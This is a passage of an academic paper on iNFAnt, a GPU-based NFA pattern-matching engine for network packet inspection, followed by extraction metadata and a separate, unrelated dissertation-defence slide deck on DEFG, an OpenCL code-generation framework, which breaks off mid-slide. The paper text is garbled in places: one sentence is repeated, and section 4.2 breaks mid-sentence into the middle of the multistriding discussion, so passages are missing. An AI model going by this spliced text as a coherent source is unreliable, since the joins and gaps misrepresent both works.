architecture radically different from GPUs in terms of specifications and programming model. 3. CUDA ARCHITECTURE The latest trends have seen a shift towards the development of inexpensive, highly-parallel and programmable GPUs. Employing these processors in fields unrelated to computer graphics has been dubbed general-purpose computation on graphical processing units or GPGPU. There are multiple kinds of programmable GPUs available on the market and only recently a standard programming interface, OpenCL\(^2\), is emerging. For the purpose of this work, we have used nVidia devices that implement and expose the Compute Unified Device Architecture\(^3\) (CUDA) programming interface. 3.1 Execution cores CUDA devices are logically composed of arrays of single instruction, multiple threads (SIMT) processors, the multiprocessors, each one containing a number of physical execution cores (typically 8). The devices support thousands of threads at the same time, multiplexed on their far smaller set of cores by a dedicated hardware scheduler that avoids the overhead usually associated to context switching. The instruction set is RISC and most instructions require multiple clock cycles for their execution instruction: efficiency comes from the large number of cores, not their individual performance which is low. In the SIMT paradigm each multiprocessor executes the same instruction simultaneously for multiple threads by assigning a different execution context to each core; when this is not possible (e.g. due to the different outcomes of a conditional branch) threads are said to diverge and the execution of groups of threads that go along different code paths is sequentialized by the scheduler. CUDA GPUs reduce the amount of branching (and thus divergence) with predicated execution, i.e., the writeback phase of most instructions can be conditionally disabled by fencing them with a predicate register: if false, the instruction is still executed but does not modify the state of the processor. Conditional execution is automatically introduced by the compiler as a replacement for small, potentially divergent code sequences e.g. in simple if-then-else constructs. 3.2 Memory hierarchy CUDA devices provide a varied hierarchy of memory areas with different sizes and access times; it is the programmer’s responsibility to choose the appropriate usage for each one, also considering access patterns and that no caching is implicitly performed by the hardware. In addition to a number of 32-bit registers shared by all the threads, each multiprocessor carries an on-chip shared memory. Even if slower than registers, shared memory is still significantly fast: its latency can be measured in tens of clock cycles; it is, however, small: our board carries 16 k\(\text{B}\) of shared memory per multiprocessor. Shared memory is also banked; multiple accesses to independent banks are carried out simultaneously but conflicts force serialization. Bulk storage is provided by global memory, ranging from hundreds of megabytes up to more than a gigabyte (depending on the card model). The on-board (though not on-chip) global memory is connected to each multiprocessor with a high-bandwidth bus, providing more than 80 Gb/s on our test card. The downside is that every access incurs in a very high latency cost, estimated around 400-600 processor cycles. Latency hiding is one of the reasons for the large number of threads supported by CUDA devices; the hardware scheduler automatically suspends threads that are waiting for the completion of global memory transactions and switches to others that are ready to run. In order to use efficiently all the available bandwidth it is necessary to perform as few accesses as possible, as wide as the memory bus allows. Since each thread typically accesses small amounts of memory at a time, a hardware controller tries to automatically coalesce many smaller memory accesses in fewer, larger transactions at run-time. This is possible only if all the accesses involved respect a well-defined pattern: on newer CUDA devices all the addresses must fall within the same naturally-aligned 256-byte memory area. CUDA devices provide two further special interfaces to global memory areas under the form of constant and texture memory that provide the additional benefit of hardware caching. Given their limitations in size (e.g. 64 k\(\text{B}\) at most for constant memory) and supported access patterns, they are currently unused by iNFAnt. 3.3 Concurrency and data-sharing model CUDA devices are intended to be used in scenarios where each thread requires minimal interaction with its siblings: only a subset of the common synchronization and communication primitives is therefore provided. \(^2\)Described at http://www.khronos.org/opencl/. \(^3\)Available at http://www.nvidia.com/object/cuda_home_new.html. For any application, the set of active threads is divided into blocks: threads from the same block are always scheduled on a specific multiprocessor and communicate through its shared memory; ad-hoc primitives enable atomic read-modify-write cycles. This is the only form of inter-thread communication currently supported by the CUDA model: there are no reliable semantics for concurrent accesses to global memory and threads belonging to different blocks cannot exchange data. Synchronization works in a similar fashion: CUDA provides primitives for pausing a thread until all the others in the same block have reached the same point in their execution flow. Once again, threads belonging to different blocks cannot interact. 4. INFANT DESIGN It appears clear from Section 3 that traditional algorithms developed for general-purpose processors are bad matches for the CUDA architecture, often using a small number of threads and paying little attention to memory access patterns. This is even more true for classic automata traversal algorithms: input symbols must be processed sequentially and their randomness can lead to unpredictable branching patterns. This is even more true for classic automata traversal algorithms. It appears likely that a good traversal algorithm should be a departure from the traditionally accepted practice. Given the CUDA architecture and the problem at hand, we have identified the following design guidelines: 1. Memory bandwidth is abundant. Reducing the number of per-thread global memory accesses is not a priority if they are fully coalesced and there are enough threads to effectively hide memory latency. Shared memory can be considered fast enough for our purpose without requiring any special considerations. 2. Memory space is scarce. This is especially true for the shared memory and for registers but global memory should be used carefully as well: although comparatively big, it is common for automata to grow beyond the available amount, even when starting from small regex sets; the ability to store very large automata is also an advantage with multistridding (described in Section 4.3). 3. Threads are cheap. In contrast to CPUs, CUDA devices are designed to work best when presented with very large numbers of threads, up to 512 per block, and the maximum number of blocks as supported by the actual GPU considered. 4. Thread divergence is expensive. The large number of threads is manageable by the hardware only if all of them execute the same instruction at the same time or if, at worst, the number of possible alternative paths is very small [5]. The program should be structured so that jumps are few and replaceable with predicated execution whenever feasible. 4.1 NFA representation In order to adhere to our guidelines and in contrast to classic approaches, iNFAnt adopts an internal format for the FSA transition graph that we dubbed symbol-first representation: the system keeps a list of \((\text{source}, \text{destination})\) tuples, representing transitions, sorted by their triggering symbol. This list can grow very large so it must be stored in a global memory array, together with an ancillary data structure that records the first transition for each symbol, to allow easy random look-ups. As an example, the representation for the automaton in fig. 1(a) is reported in fig. 1(b). The current implementation allocates 16 bits per state label, thus supporting up to 65535 states, which is more than enough for our current workloads that peak at around 6000 - 9000 states. It should be noted that this limitation does not affect the maximum number of transitions, that depends only on global memory availability. In order to reduce the number of transitions to be stored, and also to speed up execution, iNFAnt adopts a special representation for self-looping states, i.e. those with an outgoing transition to themselves for each symbol of the alphabet. These states are marked as persistent in a dedicated bit-vector and, once reached during a traversal and marked as active, they will never be reset. Bit-vectors containing current and future active state sets are stored in shared-memory. 4.2 Traversal algorithm The traversal algorithm follows naturally from the data structure definition. Many packets are batched together and mapped 1:1 to CUDA blocks to be processed in parallel; every thread in each block executes the instructions reported as pseudo-code in fig. 2. State bit-vectors appear with a \(sv\) subscript and underlined statements are performed in cooperation by all the threads in a block. More precisely, the copies in lines 1, 5, 13 are performed by assigning each thread a different portion of the bit-vectors involved. Underlined statements also correspond to synchronization points in the program: after execution, each thread will wait for the others to reach the same point before proceeding. Parallelism is exploited not only because at any given time multiple blocks are active to process multiple packets but also because for each packet each thread examines a different transition among those pending for the current symbol when running the inner \(while\) loop (lines 6 - 12). A large number of transitions can be processed in parallel this way and if there are enough threads then the time spent in processing a single symbol will be effectively equal to what would be required for a deterministic automaton. With regard to access patterns, the traversal algorithm requires global memory for reading the current input symbol and for accessing the transition table: both these ac- ![Figure 1: Symbol-first representation.](image-url) cesses can be coalesced. All the threads working on the same packet access the same symbol (and offset) at the same time because of synchronization: the card can execute a single transaction. Accesses to the transition graph accordingly: intuitively, the alphabet of a 2-strided automaton consists of all the possible pairs of original input symbols and each transition is the composition of 2 adjacent transitions of the original. The transformation required for 2-striding a FSA, documented in [2], can be performed ahead of time and off-line. After multistriding it is possible for the traversal algorithm to consider pairs of symbols at once, thus reducing global execution time. Squaring has multiple effects, most prominently producing an increase in both transition count and alphabet size. The former is not a major problem if the source automaton is small, but can (and it does, in our tests) quickly lead to memory exhaustion if this is not the case, e.g. when creating DFAs from large rule sets, thus limiting the applicability of the procedure when not working with NFAs. The increase in alphabet size, on the contrary, is particularly troublesome if the procedure is repeated multiple times, as the length of each symbol and the cardinality of the alphabet can quickly approach intractability. In order to avoid this issue iNFAnt performs an alphabet compression step that removes any symbol that does not appear on transition labels and renames all the remaining ones based on equivalence classes. Compression also makes the symbol set dense, allowing simpler data structures to be used for look-ups. Each multistriding step emits a translation table that (in general) maps pairs of input symbols into a single output symbol: this is possible without an explosion in symbol count because in most cases only a small portion of the possible symbol space is used. In order for a packet to be processed after multistriding, it must first undergo the same translation, a procedure currently performed on the host CPU using a hashed look-up table. The CPU executes this algorithm in pipeline with GPU-based automaton traversal, reducing its run-time impact; the number of symbols to be processed is halved by each rewrite and, by extension, the time required to process each data unit on the GPU is reduced, with no modifications to the traversal algorithm. 4.4 System interface A major architectural choice is how to interface the iNFAnt engine with other external components, both for the creation of the required data structures and to pass packets to and from the GPU at run-time. The current iNFAnt prototype exposes a simple API that allows loading precomputed NFAs on the graphics card and submitting a batch of packets for processing. Packet copies can be performed through DMA and results are read back in a similar fashion. While GPU operations such as transfer initiation or kernel launch are not free, they execute quickly and, in most cases, have been found to be of little relevance when compared to the actual time spent in pattern matching. 5. EXPERIMENTAL EVALUATION iNFAnt has been evaluated by comparing its throughput and memory consumption with those achieved by HFAs, that represent the current state of the art for many purposes by following closely the behavior (and speed) of DFAs on non-troublesome rule sets, while implementing strategies to prevent state space explosions. The test plan involved 3 regex sets designed to highlight different aspects of the applications under scrutiny. The http-sig rule set is composed of 2 regular expressions that recognize specific HTTP headers; the resulting automaton is simple and almost completely linear, posing little challenge both to iNFAnt and HFA and providing baseline results to compare per-byte costs. The Snort\textsuperscript{534} set (taken from \[3\]) consists of 534 regular expressions; it can be divided into subsets that share an initial portion while the tails differ, a structure that makes it a good target for HFAs. Finally, all the protocol signatures from the L7 traffic classifier\textsuperscript{4} make up the L7-filter set, which is a very complex and irregular test set where no common prefixes or other properties can be exploited. In spite of its limited size (around 120 regexs), the L7-filter is the largest of our test cases in terms of memory occupation, regardless of the form in which it is compiled. All the tests were performed using a single core of the otherwise-unloaded test machine, a 4-core Xeon machine running at 3 GHz and provided with 4 GiB of RAM; GPU tests were conducted on the same platform equipped with an nVidia GeForce 260 GTX graphics card with 1 GiB of RAM and 27 multiprocessors clocked at 1.24 GHz. All relevant caches (e.g. processor, disk) were warmed by performing unmeasured test runs. As input, a 1 GiB trace of real-world network traffic was used. The two platforms (GPU card and CPU host system) are significantly different in terms of architecture and specification, thus making their performance not directly comparable. However, they both represent significant examples of commercially available middle-tier hardware. Hence, the throughput measurements reported in the following sections should be regarded as order-of-magnitude estimates of the performance obtainable using commodity hardware devices. 5.1 Pattern-matching throughput Figure 3 reports the best throughputs obtained for all techniques. In order not to inflate the results, all measurements were performed by taking into account only payload bytes and excluding packet headers (that were not examined). The 'NFA++' data series reports results obtained by enabling the self-looping states optimization described in sec. 4.1. iNFAnt allows the user to set the number of threads per packet and the number of packets submitted to the card in a batch for parallel processing: the best results obtained by exploring the possible configuration space are reported here. As it can be seen, the throughput achieved by non-strided NFAs is comparable to though lower than corresponding HFA results. This can be justified by the higher per-byte traversal cost of NFAs and by the higher instruction execution time of GPUs: even if parallelism reduces the amount of time required to process a single packet, this is not enough to completely compensate for the aforementioned aspects. However, the situation is vastly improved by the introduction of multistriding and the self-loop state optimization, leading to far better throughputs than HFAs. Given the complexity of the CUDA architecture it is interesting to try to identify the iNFAnt performance bottleneck. Global memory bandwidth, commonly found to be a scalability limitation, is not an issue here: its measured usage is, in most cases, around 20-40 Gb/s, less than the card peak performance (around 80 Gb/s). Shared memory issues can also be ruled out: while it is true that a reduction of its usage would speed execution up (more blocks could be scheduled per multiprocessors) the simulated difference was found to be minimal. Bank conflicts arising from write contention when updating the future state vector are also rare: disabling shared memory updates altogether brings little improvement in run-time performance (1-3% in most cases). Similar considerations also hold for register usage. Profiling information\textsuperscript{5} shows that the vast majority of running time is spent in processing instructions, even if iNFAnt performs very little computation. It is therefore likely that in most cases the bottleneck lies in the relatively large number of instructions to be executed per packet, coupled with the high instruction execution time of GPUs. As with most current traversal algorithms, input symbols must be processed in order, leading to large numbers of iterations in the outer loop of fig. 2. This also explains why multistriding can improve throughput significantly. 5.2 Global memory consumption Figure 4 shows the amount of global memory required for automaton storage, which is by far the largest data structure used by both the techniques considered; shared memory occupation in iNFAnt is considerably below the maximum amount in all test cases (about 6000 states are required for L7-filter). \textsuperscript{4}Available at http://l7-filter.sf.net/. \textsuperscript{5}Not reported here due to space constraints. It appears clear that in general the NFAs used by iNFAnt use comparable or less memory than the corresponding HFAs; it is interesting to note that the L7-filter rule set is impossible to compile in HFA form on our test machine, regardless of the provisions built into the HFA model; its column in the chart corresponds to the lower bound of estimated consumption (4 GiB). A direct comparison with DFAs yields even better results for NFAs: besides L7-filter, Snort534 incurs in state space explosion as well. The difference between NFAs and other approaches is exacerbated when considering multistriding: given the increment in size, only the adoption of NFAs makes this technique feasible. The NFA memory consumption reported must also be considered as a worst-case measurement: the NFAs considered were not in a minimal, canonical form and it might be possible to further reduce their sizes by appropriately modifying the generation process. 5.3 Multistriding and self-loop handling Both throughput and memory occupation are affected by iNFAnt optimizations. As expected, in most cases multistriding improves run-time performance, mainly because of shortened input packets (in term of symbols), requiring less iterations in the traversal algorithm; the improvements observed are roughly linear with the number of automaton squarings performed, a result consistent with our bottleneck analysis. At the same time, multistriding yields larger automata, mainly because of increased transition counts; this effect is clearly visible in fig. 4. Nevertheless, iNFAnt is effective in dealing with this issue. On one side, as it can be seen from the charts the available amount of global memory is adequate in all cases; on the other side the increase in transition counts is somewhat offset by larger alphabets, making the number of transitions to be examined per symbol grow relatively slowly. As for the rewriting operation itself, in most practical cases it requires less time than automata traversal so its cost can be completely absorbed by pipelining. Self-looping state optimization, on the contrary, directly reduces transition counts. While obviously not designed to completely counteract the effects of multistriding, the introduction of separate handling for self-looping states proves to be very effective both at reducing the number of transitions stored in global memory (especially with deeper multistriding) and at speeding up execution, once again thanks to lower per-symbol transition counts. 6. CONCLUSIONS AND FUTURE WORKS This paper presented the design and evaluation of iNFAnt, a novel NFA-based pattern matching engine. iNFAnt is explicitly designed to run on graphical processing units, exploiting the large number of execution cores and the high-bandwidth memory interconnections through its ad-hoc data structure and traversal algorithm; more in detail, the automaton representation and traversal algorithm adopted by iNFAnt match well the CUDA architecture, allowing full coalescing of memory accesses and requiring very little thread divergence. The adoption of the NFA model allows a significant reduction in memory occupation from the get-go, avoiding state space issues by design and enabling iNFAnt to handle complex rule sets; the optimized handling of self-looping states further reduces memory consumption while at the same time improving run-time performance. Additional free memory, if available, can be traded off for processing speed with the adoption of multistriding, thus effectively counteracting the higher per-byte cost deriving from the non-deterministic model and the high instruction execution time taken by GPUs. Multistriding is especially feasible on the iNFAnt platform because of the lower baseline memory requirements and because the traversal performance depends on the number of transitions per input symbol; other FSA engines, especially if relying on a small alphabet, might be adversely affected by its introduction. While iNFAnt might not be the first GPU-based pattern matching engine, to the best of our knowledge, it is one of the first to use NFAs to implement a technique specifically designed for graphical processors. In contrast to most approaches ported from general-purpose CPUs, the bottleneck is not memory bandwidth but the execution cores processing speed; higher throughputs could be achieved on the same architecture with more and/or faster execution units. With regard to future developments, we are planning to perform string rewriting directly on the GPU, thus completely offloading the host CPU: while the task itself is embarrassingly parallel, an efficient implementation of look-up tables on CUDA devices is not. A more thorough evaluation of run-time behavior is also in progress, comparing iNFAnt with more alternative techniques and performing additional scalability tests on more powerful hardware devices. 7. REFERENCES
{"Source-Url": "https://iris.polito.it/retrieve/handle/11583/2373004/53283/10CCR-Infant.pdf", "len_cl100k_base": 5918, "olmocr-version": "0.1.50", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 20469, "total-output-tokens": 6814, "length": "2e12", "weborganizer": {"__label__adult": 0.0005698204040527344, "__label__art_design": 0.0006899833679199219, "__label__crime_law": 0.0008144378662109375, "__label__education_jobs": 0.000415802001953125, "__label__entertainment": 0.00016307830810546875, "__label__fashion_beauty": 0.00026726722717285156, "__label__finance_business": 0.0002340078353881836, "__label__food_dining": 0.00042510032653808594, "__label__games": 0.0008873939514160156, "__label__hardware": 0.01227569580078125, "__label__health": 0.0007739067077636719, "__label__history": 0.0005025863647460938, "__label__home_hobbies": 0.00015544891357421875, "__label__industrial": 0.00128936767578125, "__label__literature": 0.0003001689910888672, "__label__politics": 0.00043272972106933594, "__label__religion": 0.0009241104125976562, "__label__science_tech": 0.3857421875, "__label__social_life": 0.00010073184967041016, "__label__software": 0.019317626953125, "__label__software_dev": 0.572265625, "__label__sports_fitness": 0.0003993511199951172, "__label__transportation": 0.001026153564453125, "__label__travel": 0.00027489662170410156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31638, 0.02027]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31638, 0.4729]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31638, 0.92167]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 4479, false], [4479, 11071, null], [11071, 16725, null], [16725, 20377, null], [20377, 25138, null], [25138, 31638, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 4479, true], [4479, 11071, null], [11071, 16725, null], [16725, 20377, null], [20377, 25138, null], [25138, 31638, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31638, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31638, null]], "pdf_page_numbers": [[0, 0, 1], [0, 4479, 2], [4479, 11071, 3], [11071, 16725, 4], [16725, 20377, 5], [20377, 25138, 6], [25138, 31638, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31638, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
a0d5844222368dcdb5fa14727c0c6396ebcb5821
GPU DECLARATIVE FRAMEWORK: DEFG Dissertation Defense Robert Senser October 29, 2014 PhD Committee: Gita Alaghband (chair) Tom Altman (advisor) Michael Mannino Boris Stilman Tam Vu Presentation Outline • Motivation for *GPU Declarative Framework*: DEFG • Background: Graphics Processing Units (GPUs) and OpenCL • DEFG Framework – Description – Performance • Diverse Applications using DEFG – Image Filters (Sobel and Median) – Breadth-First Search – Sorting Roughly Sorted Data – Iterative Matrix Inversion • Dissertation Accomplishments • Future Research DEFG Motivation • GPUs can provide high throughput – Radeon HD 7990: 2 TFLOPS (double-precision) • Developing parallel HPC software is difficult • Parallel development for GPUs is even more difficult • GPU HPC software development requires: – Understanding of unique GPU hardware characteristics – Use of specialized algorithms – Use of GPU-specific, low-level APIs • Driving notion behind DEFG: *Let software minimize the complexity and difficulty* Background: GPUs and OpenCL • Graphics Processing Unit (GPU) – Highly specialized coprocessor – Hundreds of cores, with thousands of threads – SIMT: *Single Instruction, Multiple Thread* • Similar to Single Instruction, Multiple Data (SIMD) model • Threads not on the execution path are paused • Common GPU programming environments – OpenCL: an open, royalty-free standard – CUDA: NVIDIA proprietary • DEFG is designed for OpenCL High-Level GPU Architecture GPU Characteristics: • Processors commonly connected by Peripheral Component Interconnect Express (PCIe) bus • GPU has own fast Global RAM • Threads have a small amount of fast local memory • May have a hardware cache • Many hardware-managed threads • Lacks CPU-style predictive branching, etc. OpenCL Overview • Specification maintained by Khronos Group • Open, multiple-vendor standard • Support over a wide range of devices – GPUs – CPUs – Digital signal processors (DSPs) – Field-programmable gate arrays (FPGAs) • Device kernels written in C • Executing threads share the same kernel • CPU-side code – C/C++ – Very detailed CPU-side application programming interface (API) – Third-party bindings for Java, Python, etc. GPU Applications • Three components – Application algorithms – GPU kernel code • Can have multiple kernels per application • Each kernel usually contains an algorithm or algorithm step • Kernel code often uses GPU-specific techniques – CPU-side code • Moves OpenCL kernel to GPU • Manages GPU execution and errors • Moves application data between CPU and GPU • May contain a portion of application’s algorithms • **DEFG’s domain is the CPU-side** GPU Performance • Major GPU Performance Concerns – Kernel Instruction Path Divergence • Due to conditional statements (ifs, loops, etc.) • Threads may pause • Minimize, if not totally avoid – High Memory Latency • One RAM access time equals time of 200-500 instructions • Accesses to global RAM should be coalesced • Farber’s GPU suggestions [Farber2011]: – “Get the data on the GPU and leave it” – “Give the GPU enough work to do” – “Focus on data reuse to avoid memory limits” DEFG Overview • GPU software development tool for OpenCL • Contains a Domain Specific Language (DSL) – Specialized computer language, focused on a domain – Developer writes CPU code with DEFG’s DSL • Relative to hand-written code – *Faster development* by using declarative approach – *Simpler* by using design patterns and abstractions • DEFG generates the corresponding CPU program • Developer provides standard OpenCL GPU kernels The DEFG generates C/C++ code for the CPU DEFG Translator - DEFG Source Input - ANTLR-based Parser - XML-based Tree - Optimizer (Java) - Code Generator (C++) - Template Driven - C/C++ Output [Image of DEFG Translator Architecture] [Refs: Senser2014] DEFG Code Sample 01. declare application sobel 02. declare integer Xdim (0) 03. declare integer Ydim (0) 04. declare integer BUF_SIZE (0) 05. declaregpu gpusone (any) 06. declare kernel sobel_filter SobelFilter_Kernels ( [[ 2D,Xdim,Ydim ]] ) 07. declare integer buffer image1 ( BUF_SIZE ) 08. integer buffer image2 ( BUF_SIZE ) 09. call init_input (image1(in) Xdim (out) Ydim (out) BUF_SIZE(out)) 10. execute run1 sobel_filter ( image1(in) image2(out) ) 11. call disp_output (image2(in) Xdim (in) Ydim (in) ) 12. end (Generates 440 lines of C/C++) ... status = clSetKernelArg(sobel_filter, 1, sizeof(cl_mem), (void *)&buffer_image2); if (status != CL_SUCCESS) { handle error } // *** execution size_t global_work_size[2]; global_work_size[0] = Xdim ; global_work_size[1] = Ydim ; status = clEnqueueNDRangeKernel(commandQueue, sobel_filter, 2, NULL, global_work_size, NULL, 0, NULL, NULL); if (status != CL_SUCCESS) { handle error } // *** result buffers status = clEnqueueReadBuffer(commandQueue, buffer_image2, CL_TRUE, 0, BUF_SIZE * sizeof(int), image2, 0, NULL, NULL); ... DEFG Benefits and Features - Implements OpenCL applications with less effort - Requires writing many fewer lines of code - Encourages the developer to focus on the kernels - How is this done? - With the Domain-Specific Language - Data characteristics are declared - Pre-defined DEFG design patterns are specified - Many implementation details are managed inside DEFG - Technical Features - Abstracts the OpenCL APIs, and their many details - Automatic optimization of buffer transfers - Supports multiple GPU devices - Handles error detection DEFG Design Patterns • Invocation Patterns (*Control Flow*) – Sequential-Flow – Single-Kernel Repeat Sequence – Multiple-Kernel • Concurrent-GPU Patterns (*Multiple-GPU Support*) – Multiple-Execution – Divide-Process-Merge – Overlapped-Split-Process-Concatenate • Other patterns include: – Prefix-Allocation (buffer allocation) – Code-Morsel (code insertion) – Anytime algorithm (control flow change on event) – BLAS-Usage (interface to Basic Linear Algebra Subprograms) • Design patterns can be combined – Example: Sequential-Flow + Multiple-Execution + Divide-Process-Merge Diverse DEFG Applications • Demonstrate DEFG’s applicability • Four diverse GPU application areas – *Image Filters* • Sobel Operator • Median Filter • Showcase for multiple GPU support – *Graph Theoretic* • Breadth-First Search with large graphs • Prefix-sum based buffer management – *Sorting* • Sorting partially sorted data • Prefix scan – *Numerical* • Iterative Matrix Inversion • clMath BLAS (Basic Linear Algebra Subprograms) • Anytime algorithm Filter Application: Sobel Image Filter • Sobel operator detected edges in images • Pixel gradient was calculated from 3x3 mask • A single GPU kernel was invoked once • Example of DEFG Sobel operator processing: Common uses: Object recognition, autonomous vehicle navigation, etc. Filter Application: Median Filter - Median determined for 5x5 mask - Value at center of mask replaced by median value - Like Sobel: a single GPU kernel, invoked once - Example of DEFG median 5x5 filter processing: Common uses: Electronic signal smoothing, noise removal, image preprocessing, etc. **Application: Breadth-First Search (BFS)** - Well-studied graph-theoretic problem - Focus: BFS with Large Very Irregular (LVI) Graphs - Social Networks, Network Routing, A.I., etc. - Numerous published GPU BFS approaches, starting with Harish [Harish2007] - Harish used “Dijkstra” BFS - Level-synchronous - A GPU thread assigned to each vertex - Vertex frontier stored as a Boolean array List-Based BFS Vertex Frontier • Merrill approach to vertex buffer management [Merrill2010] – Issue: list with multiple update threads – Solution: prefix sum to allocate buffer elements • Shared buffers with multiple GPU devices Goal: Improve on $O(n \log n)$ sorting bound when sequence is partially sorted Based on the prior sorting work by T. Altman, et al. [Altman1989] $k$ is a measure of “sortedness” A sequence is $k$-sorted if no element is more than $k$ positions out of sequence This $k$-sorted trait can be exploited Knowing $k$ allows for sorts of $O(n \log k)$ If $k$ is small, obtain a substantial performance gain Parallel Roughly Sorting Algorithm Notion: Convert the large sort operation into many smaller, parallel sort operations. Algorithm steps: - LR: Left-to-right prefix scan (maximum) - RL: Right-to-left prefix scan (minimum) - DM: Computed distance measure using LR and RL - UB: Computed upper bound of distance measure - This value became the $k$ value - Value used to determine size of sort blocks - Sort: Individual blocks sorted in parallel Iterative Matrix Inversion (IMI) • Matrix inversion using M. Altman’s method [Altman1960] • Required GPU matrix operations – Used OpenCL clMath BLAS library – Required clMath integration into DEFG • With *anytime* approach – Inversion can produce early results – Balance run time against accuracy – Anytime management in DEFG M. Altman IMI Approach The initial inverse approximation, that is $R_0$, can be formed by: $$R_0 = \alpha I$$ where $\alpha = 1 / \| A \|$ $\| A \|$ is the Euclidean norm of $A$ and $I$ is the identity matrix. To invert matrix $A$, each iteration calculates: $$R_{n+1} = R_n(3I - 3AR_n + (AR_n)^2).$$ - Better $R_0$ estimate provides for quicker convergence - Application will end iterations when - Inversion quality measure is met - Maximum iterations have occurred - Anytime algorithm run-time limit is crossed Example performance: $7,000 \times 7,000$ matrix inversion in 9 iterations Accomplishments DEFG Framework • Fully Implemented – Consists of approximately 5,000 lines of code – 7 different applications – Complete User’s Guide – Packaged for general use • Design Patterns – 12+ Patterns – Patterns designed to be combined • Description of DEFG Limits DEFG Usability and Performance • Published DEFG Papers – Conference: Parallel and Distributed Processing Techniques and Applications (PDPTA’13) [Senser2013] – Conference: Parallel and Distributed Processing Techniques and Applications (PDPTA’14) [Senser2014] • Existing OpenCL applications converted to DEFG 1. Breadth-First Search (BFS) 2. Floyd-Warshall (FW, All-Pairs Shortest Path) 3. Sobel Image Filter (SOBEL) • CPU-side re-coded in DEFG, used existing GPU kernels • Comparisons between DEFG and existing applications – Lines-of-Code – Run-time Performance On average, the DEFG code is 1/20th of the reference code size • Shown are average run times • CPU-based BFS-4096 was likely faster due to CPU’s cache **Summary:** *DEFG provided equal, or better, performance* Performance of Diverse Applications • Implementations – Filtering – BFS – Sorting – Iterative Inversion • Implementation Goals – Show general applicability of DEFG – Multiple-GPU: Filtering, BFS, and Sorting – Interesting Algorithms: Sorting and Iterative Inversion – BLAS Proof of Concept: Iterative Inversion • Performance results – Problem-size characteristics – Run-time metrics – Observations for both single-GPU and multiple-GPU modes – Platform: C.S.E. Department’s Hydra server Image Filtering • Filtering Applications – Design patterns used in both SOBEL and MEDIAN • *Sequential-Flow* • *Multiple-Execution* • *Overlapped-Split-Process-Concatenate* • Image Neighborhoods – SOBEL Application: 3x3 grid – MEDIAN Application: 5x5 grid • SOBEL application refactored for multi-GPU use – Based upon earlier DEFG SOBEL application – Utilized existing OpenCL kernel SOBEL Application • Performance Tests – 50% image plus overlapped area given to each GPU – Produced identical image as 1-GPU version • Run-time Performance with 2 GPUs – Run time was not as expected • OpenCL data transfer times went up • Kernel execution times stayed the same – Issue: computational workload not sufficiently intense MEDIAN Application • CPU-side DEFG code very similar to SOBEL – Developed OpenCL kernel for MEDIAN – More computationally intense • Performance with 2-GPU, 5x5 MEDIAN – Run-time improvement with all test images • Example: Speedup of 1.34 (1.062 s / 0.794 s) with 7k by 7k image • Handled larger images (22k by 22k) than 1-GPU • Performance Analysis with 2 GPUs – Kernel execution times dropped – OpenCL data transfer times increased Breadth-First Search - BFSDP2GPU Application Summary - Design patterns used in BFSDP2GPU - Multiple-Kernel - Multiple-Execution - Divide-Process-Merge - Prefix-Allocation - DEFG use of Merrill approach - Prefix-scan based buffer allocation - “Virtual pointers” to vertices - Shared buffers are dense data structures - Otherwise, kept Harish’s sparse data structures Multiple-GPU BFS Implementation - BFSDP2GPU DEFG Application - Based on earlier DEFG BFS application - Two kernels increased to six - Used two GPUs - Complex OpenCL application - Management of shared buffers - Run-time communications between GPUs - Tested against LVI graphs - Test graphs from SNAP and DIMACS repositories - Stanford Network Analysis Package (SNAP) [SNAP2014] - Center for Discrete Mathematic and Theoretical Computer Science [DIMACS2010] - Very large graph datasets: millions of vertices and edges BFSDP2GPU Performance Results - Compared against existing DEFG BFS - Processed large graphs (4.8M vertices, 69M edges) - Run-time performance was not impressive - Run times increased by factors of 6 to 17 - Issue: OpenCL's lack of GPU-to-GPU communications (77% of run-time, 0.59 of 0.771 seconds) - Lesser issue: mix of sparse and dense data structures - External Experiment - Transfer rate comparison CUDA vs. OpenCL - CUDA GPU-to-GPU transfer: 21 times OpenCL rate Roughly Sorting • Design Patterns used in RSORT application – Multiple-Kernel – Multiple-Execution – Divide-Process-Merge • GPU sort used: Comb Sort – sort-in-place design – non-recursive – similar to Bubble Sort, but much faster – elements are compared gap apart • Five kernels: LRmax, RLmin, DM, UB, and comb_sort RSORT Performance • Comparison over three configurations – QSORT on CPU, fast sort used as baseline – RSORT with one GPU – RSORTM with two GPUs • Run-time comparisons – Generated datasets with set $k$ values – Fully perturbed data • Roughly Sorting’s run times impressive when \( k \) is small • At \( K:2000 \), with \( 2^{26} \) items • Two-GPU RSORTM is faster than QSORT • Two-GPU versus One-GPU speedup near 2 (15.36 s/ 7.4 s) • Second GPU adds sorting capacity Iterative Matrix Inversion • Design patterns used in IMIFLX application – Multiple-Kernel – BLAS-Usage • Application characteristics – Blend of blas statements and kernels • blas for matrix multiplication • kernels for simpler matrix operations – Multiple blas statements per iteration – Anytime operation stopped iterating at time limit • Analysis of application – Range of matrices: size and type – Inversion iterations – Data from University of Florida Sparse Matrix Collection [UFL2011] IMIFLX Sample Result - **Kuu Matrix**: 7,102 by 7,102 elements, sparse - **Structural problem with 